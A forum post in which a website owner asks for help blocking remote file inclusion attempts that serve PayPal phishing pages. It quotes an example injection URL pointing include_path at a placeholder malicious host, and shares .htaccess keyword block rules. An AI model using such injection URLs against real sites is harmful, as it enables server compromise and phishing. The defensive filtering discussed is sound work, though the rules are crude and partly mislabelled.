My site has been the object of numerous URL injections with the purpose of showing faux/phishing-type Paypal sites. Often the URLs will include something like this:
index.php?include_path=http://malicioussite.com/malicious_code.txt%0a???
I have filtered out the bad words in the query string (including multiple "//"s). I am having trouble removing multiple "/"s from the domain name and subdirectories. I'm not sure why the hackers are putting that in the URLs, but, when I do it, it seems to have an effect. For example,
http://mydomain.com//subdirectory//subd ... rystring=x
OR
http://mydomain.com//subdirectory//subd ... rystring=x
I realize that sending all of these to a 404 page risks thwarting harmless users, but my web host is threatening to pull the plug on my site if this continues! Here is my .htaccess as it stands now. Any suggestions would be appreciated. At this point, I'm interested in the strongest possible measures to redirect/intercept malicious URLs. I'm at a loss as to how to remove the double "/"s????
Thanks
- Code: Select all
Options +FollowSymlinks
RewriteEngine on
RewriteCond %{QUERY_STRING} chdir|upload|include_path|hack|file|http://|ftp [NC,OR]
RewriteCond %{QUERY_STRING} paypal|config|myftp|include|txt [NC]
RewriteRule (.*) 404.php
# NEXT LINE SUCCESSFULLY REMOVES MULTIPLE
# SLASHES IN QUERY_STRING.....
# IT ALSO HANDLES LINE FEEDS.....
# AND "?"s.......
RewriteCond %{QUERY_STRING} [/]{2,}|%0D|%0A|\? [NC]
RewriteRule (.*) 404.php